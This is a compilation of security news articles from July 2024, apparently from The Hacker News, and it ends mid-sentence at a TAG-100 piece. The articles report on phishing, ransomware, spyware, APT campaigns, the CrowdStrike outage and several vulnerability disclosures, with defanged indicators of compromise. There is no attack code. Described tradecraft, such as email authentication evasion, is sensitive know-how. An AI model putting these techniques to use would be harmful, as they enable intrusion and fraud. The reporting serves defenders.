"Operating in teams of 8-10, some coordinate with commentators and broadcasters of live sport (presumably on pirate streams) to promote live chat groups marketing betting websites during games," according to a report [PDF] released by the ARF in October 2023. "Others act as relationship managers to encourage customers to continue betting and others as direct customer recruitment agents."
Steps between when a user visits a site and starts placing bets
Infoblox said its own investigation into Vigorish Viper stemmed from a single
anomalous domain, kb[.]com – a gambling site named KB Sports that uses Chinese
nameservers – which also hosts yabo[.]com, the domain name for Yabo Sports.
An interesting aspect to note here is that the website is geo-blocked to users located in France and elsewhere in Europe, but is accessible from mainland China and the special administrative regions of Hong Kong and Macau.
"When visited from one of those areas, the user is redirected to another domain — for example, kb830[.]com," the researchers pointed out. "The redirection domain changes over time. Additionally, all 'right click' functionality is disabled on the site, as is text selection, hindering efforts to investigate or copy the site."
Users to the website are then served ads promoting financial incentives for betting regularly, alongside options to pay using WeChat Pay, EBpay, Alipay, JD Pay, KOIPay, AstroPay, YunShanFu, UniPay, Net Pay, Fast Pay, and NetBank. The betting takes place through agents, who place the bets, manage the deposits, and communicate with gamblers through bespoke, encrypted chat apps.
A deeper examination of the DNS query logs has also unearthed evidence that Vigorish Viper's activities transcend China to target users across the world.
Some of the other defense mechanisms embedded in these sites comprise periodically checking for signs of automated activity and serving a CAPTCHA puzzle for visitors in an attempt to avoid potential scanning efforts, or when trying to reach customer support, a task carried out by real people who have been trafficked into Southeast Asia.
That's not all. Users visiting one of Vigorish Viper's brand domains are subjected to multiple rounds of fingerprinting checks to validate that the IP address is in China and they are legitimate, before they are allowed to bet on the sites.
"Both the DNS and the software tie Vigorish Viper's entire enterprise to Yabo Sports or Yabo Group," the company said. "Their reach extends to dozens of brands, possibly hundreds, and targets users beyond Southeast Asia."
"In spite of the massive number of domain names, websites, and accompanying applications, along with overt presence in the public eye, Vigorish Viper is operating directly and inexplicably in the PRC without meaningful consequence."
PINEAPPLE and FLUXROOT Hacker Groups Abuse Google Cloud for Credential
Phishing
23.7.24
Virus The Hacker News
A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has
been observed leveraging Google Cloud serverless projects to orchestrate
credential phishing activity, highlighting the abuse of the cloud computing
model for malicious purposes.
"Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google said in its biannual Threat Horizons Report [PDF] shared with The Hacker News.
"These same features make serverless computing services for all cloud providers attractive to threat actors, who use them to deliver and communicate with their malware, host and direct users to phishing pages, and to run malware and execute malicious scripts specifically tailored to run in a serverless environment."
The campaign involved the use of Google Cloud container URLs to host credential phishing pages with the aim of harvesting login information associated with Mercado Pago, an online payments platform popular in the LATAM region.
FLUXROOT, per Google, is the threat actor known for distributing the Grandoreiro banking trojan, with recent campaigns also taking advantage of legitimate cloud services like Microsoft Azure and Dropbox to distribute the malware.
Separately, Google's cloud infrastructure has also been weaponized by another adversary named PINEAPPLE to propagate another stealer malware known as Astaroth (aka Guildma) as part of attacks targeting Brazilian users.
"PINEAPPLE used compromised Google Cloud instances and Google Cloud projects they created themselves to create container URLs on legitimate Google Cloud serverless domains such as cloudfunctions[.]net and run.app," Google noted. "The URLs hosted landing pages redirecting targets to malicious infrastructure that dropped Astaroth."
Furthermore, the threat actor is said to have attempted to bypass email gateway protections by making use of mail forwarding services that do not drop messages with failed Sender Policy Framework (SPF) records, or incorporating unexpected data in the SMTP Return-Path field in order to trigger a DNS request timeout and cause email authentication checks to fail.
The search giant said it took steps to mitigate the activities by taking down the malicious Google Cloud projects and updating its Safe Browsing lists.
The weaponization of cloud services and infrastructure by threat actors – ranging from illicit cryptocurrency mining as a consequence of weak configurations to ransomware – has been fueled by the enhanced adoption of cloud across industries.
Furthermore, the approach has the added benefit of allowing adversaries to blend into normal network activities, making detection a lot more challenging.
"Threat actors take advantage of the flexibility and ease of deployment of serverless platforms to distribute malware and host phishing pages," the company said. "Threat actors abusing cloud services shift their tactics in response to defenders' detection and mitigation measures."
SocGholish Malware Exploits BOINC Project for Covert Cyberattacks
23.7.24
Virus The Hacker News
The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being
used to deliver a remote access trojan called AsyncRAT as well as a legitimate
open-source project called BOINC.
BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source "volunteer computing" platform maintained by the University of California with an aim to carry out "large-scale distributed high-throughput computing" using participating home computers on which the app is installed.
"It's similar to a cryptocurrency miner in that way (using computer resources to do work), and it's actually designed to reward users with a specific type of cryptocurrency called Gridcoin, designed for this purpose," Huntress researchers Matt Anderson, Alden Schmidt, and Greg Linares said in a report published last week.
These malicious installations are designed to connect to an actor-controlled domain ("rosettahome[.]cn" or "rosettahome[.]top"), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. As of July 15, 10,032 clients are connected to the two domains.
The cybersecurity firm said while it hasn't observed any follow-on activity or tasks being executed by the infected hosts, it hypothesized that the "host connections could be sold off as initial access vectors to be used by other actors and potentially used to execute ransomware."
SocGholish attack sequences typically begin when users land on compromised websites, where they are prompted to download a fake browser update that, upon execution, triggers the retrieval of additional payloads to the infiltrated machines.
The JavaScript downloader, in this case, activates two disjointed chains, one that leads to the deployment of a fileless variant of AsyncRAT and the other resulting in the BOINC installation.
The BOINC app, which is renamed as "SecurityHealthService.exe" or "trustedinstaller.exe"
to evade detection, sets up persistence using a scheduled task by means of a
PowerShell script.
The misuse of BOINC for malicious purposes hasn't gone unnoticed by the project maintainers, who are currently investigating the problem and finding a way to "defeat this malware." Evidence of the abuse dates back to at least June 26, 2024.
"The motivation and intent of the threat actor by loading this software onto infected hosts isn't clear at this point," the researchers said.
"Infected clients actively connecting to malicious BOINC servers present a fairly high risk, as there's potential for a motivated threat actor to misuse this connection and execute any number of malicious commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain."
The development comes as Check Point said it's been tracking the use of compiled V8 JavaScript by malware authors to sidestep static detections and conceal remote access trojans, stealers, loaders, cryptocurrency miners, wipers, and ransomware.
"In the ongoing battle between security experts and threat actors, malware developers keep coming up with new tricks to hide their attacks," security researcher Moshe Marelus said. "It's not surprising that they've started using V8, as this technology is commonly used to create software as it is very widespread and extremely hard to analyze."
New Linux Variant of Play Ransomware Targeting VMware ESXi Systems
23.7.24
Ransom The Hacker News
Cybersecurity researchers have discovered a new Linux variant of a ransomware
strain known as Play (aka Balloonfly and PlayCrypt) that's designed to target
VMware ESXi environments.
"This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations," Trend Micro researchers said in a report published Friday.
Play, which arrived on the scene in June 2022, is known for its double extortion tactics, encrypting systems after exfiltrating sensitive data and demanding payment in exchange for a decryption key. According to estimates released by Australia and the U.S., as many as 300 organizations have been victimized by the ransomware group as of October 2023.
Statistics shared by Trend Micro for the first seven months of 2024 show that the U.S. is the country with the highest number of victims, followed by Canada, Germany, the U.K., and the Netherlands.
Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period.
The cybersecurity firm's analysis of a Linux variant of Play comes from a RAR archive file hosted on an IP address (108.61.142[.]190), which also contains other tools identified as utilized in previous attacks such as PsExec, NetScan, WinSCP, WinRAR, and the Coroxy backdoor.
"Though no actual infection has been observed, the command-and-control (C&C) server hosts the common tools that Play ransomware currently uses in its attacks," it said. "This could denote that the Linux variant might employ similar tactics, techniques, and procedures (TTPs)."
The ransomware sample, upon execution, ensures that it's running in an ESXi environment before proceeding to encrypt virtual machine (VM) files, including VM disk, configuration, and metadata files, and appending them with the extension ".PLAY." A ransom note is then dropped in the root directory.
Further analysis has determined that the Play ransomware group is likely using the services and infrastructure peddled by Prolific Puma, which offers an illicit link-shortening service to other cybercriminals to help them evade detection while distributing malware.
Specifically, it employs what's called a registered domain generation algorithm
(RDGA) to spin up new domain names, a programmatic mechanism that's increasingly
being used by several threat actors, including VexTrio Viper and Revolver Rabbit,
for phishing, spam, and malware propagation.
Revolver Rabbit, for instance, is believed to have registered over 500,000 domains on the ".bond" top-level domain (TLD) at an approximate cost of more than $1 million, leveraging them as active and decoy C2 servers for the XLoader (aka FormBook) stealer malware.
"The most common RDGA pattern this actor uses is a series of one or more dictionary words followed by a five-digit number, with each word or number separated by a dash," Infoblox noted in a recent analysis. "Sometimes the actor uses ISO 3166-1 country codes, full country names, or numbers corresponding to years instead of dictionary words."
RDGAs are a lot more challenging to detect and defend against than traditional DGAs owing to the fact that they allow threat actors to generate many domain names to register them for use – either all at once or over time – in their criminal infrastructure.
"In an RDGA, the algorithm is a secret kept by the threat actor, and they register all the domain names," Infoblox said. "In a traditional DGA, the malware contains an algorithm that can be discovered, and most of the domain names will not be registered. While DGAs are used exclusively for connection to a malware controller, RDGAs are used for a wide range of malicious activity."
The latest findings indicate a potential collaboration between two cybercriminal entities, suggesting that the Play ransomware actors are taking steps to bypass security protocols through Prolific Puma's services.
"ESXi environments are high-value targets for ransomware attacks due to their critical role in business operations," Trend Micro concluded. "The efficiency of encrypting numerous VMs simultaneously and the valuable data they hold further elevate their lucrativeness for cybercriminals."
Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT
Malware
21.7.24
Virus The Hacker News
Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide
IT disruptions by pushing out a flawed update to Windows devices, is now warning
that threat actors are exploiting the situation to distribute Remcos RAT to its
customers in Latin America under the guise of a providing a hotfix.
The attack chains involve distributing a ZIP archive file named "crowdstrike-hotfix.zip," which contains a malware loader named Hijack Loader (aka DOILoader or IDAT Loader) that, in turn, launches the Remcos RAT payload.
Specifically, the archive file also includes a text file ("instrucciones.txt") with Spanish-language instructions that urges targets to run an executable file ("setup.exe") to recover from the issue.
"Notably, Spanish filenames and instructions within the ZIP archive indicate this campaign is likely targeting Latin America-based (LATAM) CrowdStrike customers," the company said, attributing the campaign to a suspected e-crime group.
On Friday, CrowdStrike acknowledged that a routine sensor configuration update pushed to its Falcon platform for Windows devices on July 19 at 04:09 UTC inadvertently triggered a logic error that resulted in a Blue Screen of Death (BSoD), rendering numerous systems inoperable and sending businesses into a tailspin.
The event impacted customers running Falcon sensor for Windows version 7.11 and above, who were online between 04:09 and 05:27 a.m. UTC.
Malicious actors have wasted no time capitalizing on the chaos created by the event to set up typosquatting domains impersonating CrowdStrike and advertise services to companies affected by the issue in return for a cryptocurrency payment.
Customers who are impacted are recommended to "ensure they are communicating with CrowdStrike representatives through official channels and adhere to technical guidance the CrowdStrike support teams have provided."
17-Year-Old Linked to Scattered Spider Cybercrime Syndicate Arrested in U.K.
21.7.24
Crime The Hacker News
Law enforcement officials in the U.K. have arrested a 17-year-old boy from
Walsall who is suspected to be a member of the notorious Scattered Spider
cybercrime syndicate.
The arrest was made "in connection with a global cyber online crime group which has been targeting large organizations with ransomware and gaining access to computer networks," West Midlands police said. "The arrest is part of a global investigation into a large-scale cyber hacking community which has targeted a number of major companies which includes MGM Resorts in America."
The teen's arrest, carried out in coordination with the U.K. National Crime Agency (NCA) and the U.S. Federal Bureau of Investigation (FBI), comes a little over a month after another 22-year-old member of the e-crime syndicate from the U.K. was apprehended in Spain.
Scattered Spider, an offshoot of a loose-knit group called The Com, has evolved into an initial access broker and affiliate, delivering ransomware families like BlackCat, Qilin, and RansomHub. A recent report from Google-owned Mandiant revealed the attackers' pivot to encryptionless extortion attacks that aim to steal data from software-as-a-service (SaaS) applications.
The development comes as the DoJ announced the sentencing of Scott Raul Esparza, 24, of Texas, to nine months in prison for running a distributed denial-of-service (DDoS) attack solution named Astrostress between 2019 and 2022, following which he is expected to serve two years of supervised release. He pleaded guilty to the charges earlier in March.
"Customers of Astrostress.com were offered various levels of subscriptions – depending on how many attacks they wanted to conduct and with what power – and were charged accordingly," the DoJ said. "This site thus enabled co-conspirators worldwide to set up accounts on Astrostress.com and then use the Astrostress.com resources to direct attacks at internet-connected computers around the globe."
Esparza, who procured the attack servers and maintained the service, is said to have collaborated with Shamar Shattock, 21, of Florida. Shattock faces up to five years in prison after pleading guilty in March 2023.
It also comes in the wake of sanctions imposed by the U.S. Treasury Department against Yuliya Vladimirovna Pankratova and Denis Olegovich Degtyarenko, two members of CyberArmyofRussia_Reborn (CARR), a hacktivist persona tied to the prolific Russia-based Sandworm (aka APT44) group, for engaging in cyber attacks targeting critical infrastructure in the country.
Pankratova (aka YUliYA) is believed to be the leader of CARR and its spokesperson, with Degtyarenko (aka Dena) working as the primary hacker for the group and allegedly responsible for the compromise of a Supervisory Control and Data Acquisition (SCADA) system of an unnamed U.S. energy company.
"Using various unsophisticated techniques, CARR has been responsible for manipulating industrial control system equipment at water supply, hydroelectric, wastewater, and energy facilities in the U.S. and Europe," the department's Office of Foreign Assets Control (OFAC) said.
Faulty CrowdStrike Update Crashes Windows Systems, Impacting Businesses
Worldwide
19.7.24
Security
The Hacker News
Businesses across the world have been hit by widespread disruptions to their Windows workstations stemming from a faulty update pushed out by cybersecurity company CrowdStrike.
"CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts," the company's CEO George Kurtz said in a statement. "Mac and Linux hosts are not impacted. This is not a security incident or cyberattack."
The company, which acknowledged "reports of [Blue Screens of Death] on Windows hosts," further said it has identified the issue and a fix has been deployed for its Falcon Sensor product, urging customers to refer to the support portal for the latest updates.
For systems that have been already impacted by the problem, the mitigation instructions are listed below -
Boot Windows in Safe Mode or Windows Recovery Environment
Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
Find the file named "C-00000291*.sys" and delete it
Restart the computer or server normally
It's worth noting that the outage has also impacted Google Cloud Compute Engine,
causing Windows virtual machines using Crowdstrike's csagent.sys to crash and go
into an unexpected reboot state.
"After having automatically received a defective patch from Cloudstrike, Windows VMs crash and will not be able to reboot," it said. "Windows VMs that are currently up and running should no longer be impacted."
Security researcher Kevin Beaumont said "I have obtained the Crowdstrike driver they pushed via auto update. I don't know how it happened, but the file isn't a validly formatted driver and causes Windows to crash every time."
"Crowdstrike is the top tier EDR product, and is on everything from point of sale to ATMs etc – this will be the biggest 'cyber' incident worldwide ever in terms of impact, most likely."
Airlines, financial institutions, food and retail chains, hospitals, hotels, news organizations, railway networks, and telecom firms are among the many businesses affected. Shares of CrowdStrike have tanked 15% in U.S. premarket trading.
"The current event appears – even in July – that it will be one of the most significant cyber issues of 2024," Omer Grossman, Chief Information Officer (CIO) at CyberArk, said in a statement shared with The Hacker News. "The damage to business processes at the global level is dramatic. The glitch is due to a software update of CrowdStrike's EDR product."
"This is a product that runs with high privileges that protects endpoints. A malfunction in this can, as we are seeing in the current incident, cause the operating system to crash."
The recovery is expected to take days as the problem needs to be solved manually, endpoint by endpoint, by starting them in Safe Mode and removing the buggy driver, Grossman pointed out, adding the root cause behind the malfunction will be of the "utmost interest."
Jake Moore, global security advisor at Slovakian cybersecurity company ESET, told The Hacker News that the incident serves to highlight the need for implementing multiple "fail safes" in place and diversification of IT infrastructure.
"Upgrades and maintenance to systems and networks can unintentionally include small errors, which can have wide-reaching consequences as experienced today by Crowdstrike's customers," Moore said.
"Another aspect of this incident relates to 'diversity' in the use of large-scale IT infrastructure. This applies to critical systems like operating systems (OSes), cybersecurity products, and other globally deployed (scaled) applications. Where diversity is low, a single technical incident, not to mention a security issue, can lead to global-scale outages with subsequent knock-on effects."
The development comes as Microsoft is recovering from a separate outage of its own that caused issues with Microsoft 365 apps and services, including Defender, Intune, OneNote, OneDrive for Business, SharePoint Online, Windows 365, Viva Engage, and Purview.
"A configuration change in a portion of our Azure backend workloads, caused interruption between storage and compute resources which resulted in connectivity failures that affected downstream Microsoft 365 services dependent on these connections," the tech giant said.
Pro-Houthi Group Targets Yemen Aid Organizations with Android Spyware
19.7.24
Virus
The Hacker News
A suspected pro-Houthi threat group targeted at least three humanitarian organizations in Yemen with Android spyware designed to harvest sensitive information.
These attacks, attributed to an activity cluster codenamed OilAlpha, entail a new set of malicious mobile apps that come with their own supporting infrastructure, Recorded Future's Insikt Group said.
Targets of the ongoing campaign include, CARE International, the Norwegian Refugee Council (NRC), and the Saudi Arabian King Salman Humanitarian Aid and Relief Centre.
"The OilAlpha threat group is highly likely active and executing targeted activity against humanitarian and human rights organizations operating in Yemen, and potentially throughout the Middle East," the cybersecurity company said.
OilAlpha was first documented in May 2023 in connection with an espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula.
These attacks leveraged WhatsApp to distribute malicious Android APK files by passing them off as associated with legitimate organizations like UNICEF, ultimately leading to the deployment of a malware strain named SpyNote (aka SpyMax).
The latest wave, identified in early June 2024, comprises apps that claim to be
related to humanitarian relief programs and masquerade as entities like CARE
International and the NRC, both of which have an active presence in Yemen.
Once installed, these apps – which harbor the SpyMax trojan – request intrusive permissions, thereby facilitating the theft of victim data.
OilAlpha's operations also include a credential harvesting component that utilizes a bunch of fake login pages impersonating these organizations in an effort to harvest users' login information. It's suspected that the goal is to carry out espionage efforts by accessing accounts associated with the affected organizations.
"Houthi militants have continually sought to restrict the movement and delivery of international humanitarian assistance and have profited from taxing and re-selling aid materials," Recorded Future said.
"One possible explanation for the observed cyber targeting is that it is intelligence-gathering to facilitate efforts to control who gets aid and how it is delivered."
The development arrives weeks after Lookout implicated a Houthi-aligned threat actor to another surveillanceware operation that delivers an Android data-gathering tool called GuardZoo to targets in Yemen and other countries in the Middle East.
APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K.
19.7.24
APT
The Hacker News
Several organizations operating within global shipping and logistics, media and
entertainment, technology, and automotive sectors in Italy, Spain, Taiwan,
Thailand, Turkey, and the U.K. have become the target of a "sustained campaign"
by the prolific China-based APT41 hacking group.
"APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since 2023, enabling them to extract sensitive data over an extended period," Google-owned Mandiant said in a new report published Thursday.
The threat intelligence firm described the adversarial collective as unique among China-nexus actors owing to its use of "non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions."
Attack chains involve the use of web shells (ANTSWORD and BLUEBEAM), custom droppers (DUSTPAN and DUSTTRAP), and publicly available tools (SQLULDR2 and PINEGROVE) to achieve persistence, deliver additional payloads, and exfiltrate data of interest.
The web shells act as a conduit to download the DUSTPAN (aka StealthVector) dropper that's responsible for loading Cobalt Strike Beacon for command-and-control (C2) communication, followed by the deployment of the DUSTTRAP dropper post lateral movement.
DUSTTRAP, for its part, is configured to decrypt a malicious payload and execute it in memory, which, in turn, establishes contact with an attacker-controlled server or a compromised Google Workspace account in an attempt to conceal its malicious activities.
Google said the identified Workspace accounts have been remediated to prevent unauthorized access. It, however, did not reveal how many accounts were affected.
The intrusions are also characterized by the use of SQLULDR2 to export data from Oracle Databases to a local text-based file and PINEGROVE to transmit large volumes of sensitive data from compromised networks by abusing Microsoft OneDrive as an exfiltration vector.
It's worth noting here that the malware families that Mandiant tracks as DUSTPAN and DUSTTRAP share overlaps with those that have been codenamed DodgeBox and MoonWalk, respectively, by Zscaler ThreatLabz.
"DUSTTRAP is a multi-stage plugin framework with multiple components," Mandiant
researchers said, adding it identified at least 15 plugins that are capable of
executing shell commands, carrying out file system operations, enumerating and
terminating processes, capturing keystrokes and screenshots, gathering system
information, and modifying Windows Registry.
It's also engineered to probe remote hosts, perform domain name system (DNS) lookups, list remote desktop sessions, upload files, and conduct various manipulations to Microsoft Active Directory.
"The DUSTTRAP malware and its associated components that were observed during the intrusion were code signed with presumably stolen code signing certificates," the company said. "One of the code signing certificates seemed to be related to a South Korean company operating in the gaming industry sector."
GhostEmperor Comes Back to Haunt#
The disclosure comes as Israeli cybersecurity company Sygnia revealed details of
a cyber attack campaign mounted by a sophisticated China-nexus threat group
called GhostEmperor to deliver a variant of the Demodex rootkit.
The exact method used to breach targets is currently not clear, although the group has been previously observed exploiting known flaws in internet-facing applications. The initial access facilitates the execution of a Windows batch script, which drops a Cabinet archive (CAB) file to ultimately launch a core implant module.
The implant is equipped to manage C2 communications and install the Demodex kernel rootkit by using an open-source project named Cheat Engine to get around the Windows Driver Signature Enforcement (DSE) mechanism.
"GhostEmperor employs a multi-stage malware to achieve stealth execution and persistence and utilizes several methods to impede analysis process," Security researcher Dor Nizar said.
SolarWinds Patches 11 Critical Flaws in Access Rights Manager Software
19.7.24
Vulnerebility
The Hacker News
SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.
Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS score of 7.6 and one scoring 8.3.
The most severe of the flaws are listed below -
CVE-2024-23472 - SolarWinds ARM Directory Traversal Arbitrary File Deletion and
Information Disclosure Vulnerability
CVE-2024-28074 - SolarWinds ARM Internal Deserialization Remote Code Execution
Vulnerability
CVE-2024-23469 - Solarwinds ARM Exposed Dangerous Method Remote Code Execution
Vulnerability
CVE-2024-23475 - Solarwinds ARM Traversal and Information Disclosure
Vulnerability
CVE-2024-23467 - Solarwinds ARM Traversal Remote Code Execution Vulnerability
CVE-2024-23466 - Solarwinds ARM Directory Traversal Remote Code Execution
Vulnerability
CVE-2024-23470 - Solarwinds ARM UserScriptHumster Exposed Dangerous Method
Remote Command Execution Vulnerability
CVE-2024-23471 - Solarwinds ARM CreateFile Directory Traversal Remote Code
Execution Vulnerability
Successful exploitation of the aforementioned vulnerabilities could allow an
attacker to read and delete files and execute code with elevated privileges.
The shortcomings have been addressed in version 2024.3 released on July 17, 2024, following responsible disclosure as part of the Trend Micro Zero Day Initiative (ZDI).
The development comes after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) placed a high-severity path traversal flaw in SolarWinds Serv-U Path (CVE-2024-28995, CVSS score: 8.6) to its Known Exploited Vulnerabilities (KEV) catalog following reports of active exploitation in the wild.
The network security company was the victim of a major supply chain attack in 2020 after the update mechanism associated with its Orion network management platform was compromised by Russian APT29 hackers to distribute malicious code to downstream customers as part of a high-profile cyber espionage campaign.
The breach prompted the U.S. Securities and Exchange Commission (SEC) to file a lawsuit against SolarWinds and its chief information security officer (CISO) last October alleging the company failed to disclose adequate material information to investors regarding cybersecurity risks.
However, much of the claims pertaining to the lawsuit were thrown out by the U.S. District Court for the Southern District of New York on July 18, stating "these do not plausibly plead actionable deficiencies in the company's reporting of the cybersecurity hack" and that they "impermissibly rely on hindsight and speculation."
WazirX Cryptocurrency Exchange Loses $230 Million in Major Security Breach
19.7.24
Cryptocurrency
The Hacker News
Indian cryptocurrency exchange WazirX has confirmed that it was the target of a
security breach that led to the theft of $230 million in cryptocurrency assets.
"A cyber attack occurred in one of our [multi-signature] wallets involving a loss of funds exceeding $230 million," the company said in a statement. "This wallet was operated utilizing the services of Liminal's digital asset custody and wallet infrastructure from February 2023."
The Mumbai-based company said the attack stemmed from a mismatch between the information that was displayed on Liminal's interface and what was actually signed. It said the payload was replaced to transfer wallet control to an attacker.
Crypto custody firm Liminal is one of the six signatories on the wallet and is responsible for transaction verifications.
"Our preliminary investigations show that one of the self custody multi-sig smart contract wallets created outside of the Liminal ecosystem has been compromised," Liminal said in a series of posts shared on X.
"It is also pertinent to note that all WazirX wallets created on the Liminal platform continue to remain secure and protected. Meanwhile, all the malicious transactions to the attacker's addresses have occurred from outside of the Liminal platform."
Blockchain analytics firm Elliptic said the attack has all the hallmarks of North Korean threat actors, and that the attackers have taken the step of swapping the crypto assets for Ether using various decentralized services.
This was also reiterated by crypto researcher ZachXBT on X, who said "the WazirX hack has the potential markings of a Lazarus Group attack (yet again)."
Threat actors affiliated with North Korea have a track record of staging cyber
attacks targeting the cryptocurrency sector since at least 2017 as a way to get
around international sanctions imposed against the country.
Earlier this year, the United Nations said it was probing 58 suspected intrusions carried out by the nation-state actors between 2017 and 2023 that netted $3 billion in illegal revenues to help it advance its nuclear weapons program.
The disclosure comes against the backdrop of a coordinated law enforcement operation codenamed Spincaster that shut down scam networks making illicit profits off approval phishing, a popular tactic in which funds are stolen through fake crypto apps and romance scams (aka pig butchering). As much as $2.7 billion is estimated to have been stolen using this method since May 2021.
"With the approval phishing technique, the scammer tricks the user into signing a malicious blockchain transaction that gives the scammer's address approval to spend specific tokens inside the victim's wallet, allowing the scammer to then drain the victim's address of those tokens at will," Chainalysis said.
Alert: HotPage Adware Disguised as Ad Blocker Installs Malicious Kernel
Driver
18.7.24
Virus
The Hacker News
Cybersecurity researchers have shed light on an adware module that purports to
block ads and malicious websites, while stealthily offloading a kernel driver
component that grants attackers the ability to run arbitrary code with elevated
permissions on Windows hosts.
The malware, dubbed HotPage, gets its name from the eponymous installer ("HotPage.exe"), according to new findings from ESET.
The installer "deploys a driver capable of injecting code into remote processes, and two libraries capable of intercepting and tampering with browsers' network traffic," ESET researcher Romain Dumont said in a technical analysis published today.
"The malware can modify or replace the contents of a requested page, redirect the user to another page, or open a new page in a new tab based on certain conditions."
Besides leveraging its browser traffic interception and filtering capabilities to display game-related ads, it is designed to harvest and exfiltrate system information to a remote server associated with a Chinese company named Hubei Dunwang Network Technology Co., Ltd (湖北盾网网络科技有限公司).
This is accomplished by means of a driver, whose primary objective is to inject the libraries into browser applications and alter their execution flow to change the URL being accessed or ensure that the homepage of the new web browser instance is redirected to a particular URL specified in a configuration.
That's not all. The absence of any access control lists (ACLs) for the driver meant that an attacker with a non-privileged account could leverage it to obtain elevated privileges and run code as the NT AUTHORITY\System account.
"This kernel component unintentionally leaves the door open for other threats to run code at the highest privilege level available in the Windows operating system: the System account," Dumont said. "Due to improper access restrictions to this kernel component, any processes can communicate with it and leverage its code injection capability to target any non-protected processes."
Although the exact method by which the installer is distributed is not known,
evidence gathered by the Slovakian cybersecurity firm shows that it has been
advertised as a security solution for internet cafés that's intended to improve
users' browsing experience by stopping ads.
The embedded driver is notable for the fact that it's signed by Microsoft. The Chinese company is believed to have gone through Microsoft's driver code signing requirements and managed to obtain an Extended Verification (EV) certificate. It has been removed from the Windows Server Catalog as of May 1, 2024.
Kernel-mode drivers have been required to be digitally signed to be loaded by the Windows operating system, an important layer of defense erected by Microsoft to protect against malicious drivers that could be weaponized to subvert security controls and interfere with system processes.
That said, Cisco Talos revealed last July how native Chinese-speaking threat actors are exploiting a Microsoft Windows policy loophole to forge signatures on kernel-mode drivers.
"The analysis of this rather generic-looking piece of malware has proven, once again, that adware developers are still willing to go the extra mile to achieve their goals," Dumont said.
"Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component."
SAP AI Core Vulnerabilities Expose
Customer Data to Cyber Attacks
18.7.24
AI
The Hacker News
Cybersecurity researchers have uncovered security shortcomings in SAP AI Core
cloud-based platform for creating and deploying predictive artificial
intelligence (AI) workflows that could be exploited to get hold of access tokens
and customer data.
The five vulnerabilities have been collectively dubbed SAPwned by cloud security firm Wiz.
"The vulnerabilities we found could have allowed attackers to access customers' data and contaminate internal artifacts – spreading to related services and other customers' environments," security researcher Hillai Ben-Sasson said in a report shared with The Hacker News.
Following responsible disclosure on January 25, 2024, the weaknesses were addressed by SAP as of May 15, 2024.
In a nutshell, the flaws make it possible to obtain unauthorized access to customers' private artifacts and credentials to cloud environments like Amazon Web Services (AWS), Microsoft Azure, and SAP HANA Cloud.
They could also be used to modify Docker images on SAP's internal container registry, SAP's Docker images on the Google Container Registry, and artifacts hosted on SAP's internal Artifactory server, resulting in a supply chain attack on SAP AI Core services.
Furthermore, the access could be weaponized to gain cluster administrator privileges on SAP AI Core's Kubernetes cluster by taking advantage of the fact that the Helm package manager server was exposed to both read and write operations.
"Using this access level, an attacker could directly access other customer's Pods and steal sensitive data, such as models, datasets, and code," Ben-Sasson explained. "This access also allows attackers to interfere with customer's Pods, taint AI data and manipulate models' inference."
Wiz said the issues arise due to the platform making it feasible to run malicious AI models and training procedures without adequate isolation and sandboxing mechanisms.
"The recent security flaws in AI service providers like Hugging Face, Replicate, and SAP AI Core highlight significant vulnerabilities in their tenant isolation and segmentation implementations," Ben-Sasson told The Hacker News. "These platforms allow users to run untrusted AI models and training procedures in shared environments, increasing the risk of malicious users being able to access other users' data."
"Unlike veteran cloud providers who have vast experience with tenant-isolation practices and use robust isolation techniques like virtual machines, these newer services often lack this knowledge and rely on containerization, which offers weaker security. This underscores the need to raise awareness of the importance of tenant isolation and to push the AI service industry to harden their environments."
As a result, a threat actor could create a regular AI application on SAP AI Core, bypass network restrictions, and probe the Kubernetes Pod's internal network to obtain AWS tokens and access customer code and training datasets by exploiting misconfigurations in AWS Elastic File System (EFS) shares.
"People should be aware that AI models are essentially code. When running AI models on your own infrastructure, you could be exposed to potential supply chain attacks," Ben-Sasson said.
"Only run trusted models from trusted sources, and properly separate between external models and sensitive infrastructure. When using AI services providers, it's important to verify their tenant-isolation architecture and ensure they apply best practices."
The findings come as Netskope revealed that the growing enterprise use of generative AI has prompted organizations to use blocking controls, data loss prevention (DLP) tools, real-time coaching, and other mechanisms to mitigate risk.
"Regulated data (data that organizations have a legal duty to protect) makes up more than a third of the sensitive data being shared with generative AI (genAI) applications — presenting a potential risk to businesses of costly data breaches," the company said.
They also follow the emergence of a new cybercriminal threat group called NullBulge that has trained its sights on AI- and gaming-focused entities since April 2024 with an aim to steal sensitive data and sell compromised OpenAI API keys in underground forums while claiming to be a hacktivist crew "protecting artists around the world" against AI.
"NullBulge targets the software supply chain by weaponizing code in publicly available repositories on GitHub and Hugging Face, leading victims to import malicious libraries, or through mod packs used by gaming and modeling software," SentinelOne security researcher Jim Walter said.
"The group uses tools like AsyncRAT and XWorm before delivering LockBit payloads built using the leaked LockBit Black builder. Groups like NullBulge represent the ongoing threat of low-barrier-of-entry ransomware, combined with the evergreen effect of info-stealer infections."
TAG-100: New Threat Actor Uses
Open-Source Tools for Widespread Attacks
18.7.24
APT
The Hacker News
Unknown threat actors have been observed leveraging open-source tools as part of
